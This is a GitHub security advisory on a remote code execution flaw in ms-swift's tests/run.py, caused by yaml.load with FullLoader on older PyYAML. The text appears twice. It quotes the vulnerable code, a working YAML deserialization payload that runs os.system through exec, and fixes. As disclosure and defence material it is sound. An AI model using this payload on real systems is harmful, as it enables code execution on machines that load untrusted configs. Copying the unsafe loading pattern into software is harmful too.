Headline
GHSA-fm6c-f59h-7mmg: MS SWIFT Remote Code Execution via unsafe PyYAML deserialization
Description
A Remote Code Execution (RCE) vulnerability exists in the modelscope/ms-swift project due to unsafe use of yaml.load() in combination with vulnerable versions of the PyYAML library (≤ 5.3.1). The issue resides in the tests/run.py script, where a user-supplied YAML configuration file is deserialized using yaml.load() with yaml.FullLoader.
If an attacker can control or replace the YAML configuration file provided to the --run_config argument, they may inject a malicious payload that results in arbitrary code execution.
Affected Repository
- Project: modelscope/ms-swift
- Affect versions: latest
- File:
tests/run.py - GitHub Permalink: https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
- Dependency: PyYAML <= 5.3.1
Vulnerable Code
if args.run_config is not None and Path(args.run_config).exists():
with open(args.run_config, encoding='utf-8') as f:
run_config = yaml.load(f, Loader=yaml.FullLoader)
Proof of Concept (PoC)
Step 1: Create malicious YAML file (exploit.yaml)
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"
Step 2: Execute with vulnerable PyYAML (<= 5.3.1)
import yaml
with open("exploit.yaml", "r") as f:
cfg = yaml.load(f, Loader=yaml.FullLoader)
This results in execution of os.system, proving code execution.
Mitigation
- Replace
yaml.load()withyaml.safe_load() - Upgrade PyYAML to version 5.4 or later
Example Fix:
# Before
yaml.load(f, Loader=yaml.FullLoader)
# After
yaml.safe_load(f)
Author
- Discovered by: Yu Rong (戎誉) and Hao Fan (凡浩)
- Contact: [anchor.rongyu020221@gmail.com]
Description
A Remote Code Execution (RCE) vulnerability exists in the modelscope/ms-swift project due to unsafe use of yaml.load() in combination with vulnerable versions of the PyYAML library (≤ 5.3.1). The issue resides in the tests/run.py script, where a user-supplied YAML configuration file is deserialized using yaml.load() with yaml.FullLoader.
If an attacker can control or replace the YAML configuration file provided to the --run_config argument, they may inject a malicious payload that results in arbitrary code execution.
Affected Repository
- Project: modelscope/ms-swift
- Affect versions: latest
- File: tests/run.py
- GitHub Permalink: https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
- Dependency: PyYAML <= 5.3.1
Vulnerable Code
if args.run_config is not None and Path(args.run_config).exists(): with open(args.run_config, encoding=’utf-8’) as f: run_config = yaml.load(f, Loader=yaml.FullLoader)
Proof of Concept (PoC)****Step 1: Create malicious YAML file (exploit.yaml)
!!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "__import__(‘os’).system(‘mkdir HACKED’)"
Step 2: Execute with vulnerable PyYAML (<= 5.3.1)
import yaml
with open("exploit.yaml", “r”) as f: cfg = yaml.load(f, Loader=yaml.FullLoader)
This results in execution of os.system, proving code execution.
Mitigation
- Replace yaml.load() with yaml.safe_load()
- Upgrade PyYAML to version 5.4 or later
Example Fix:
# Before yaml.load(f, Loader=yaml.FullLoader)
# After yaml.safe_load(f)
Author
- Discovered by: Yu Rong (戎誉) and Hao Fan (凡浩)
- Contact: [anchor.rongyu020221@gmail.com]
References
- GHSA-fm6c-f59h-7mmg
- modelscope/ms-swift#5174
- modelscope/ms-swift@b3418ed
- https://github.com/Anchor0221/CVE-2025-50460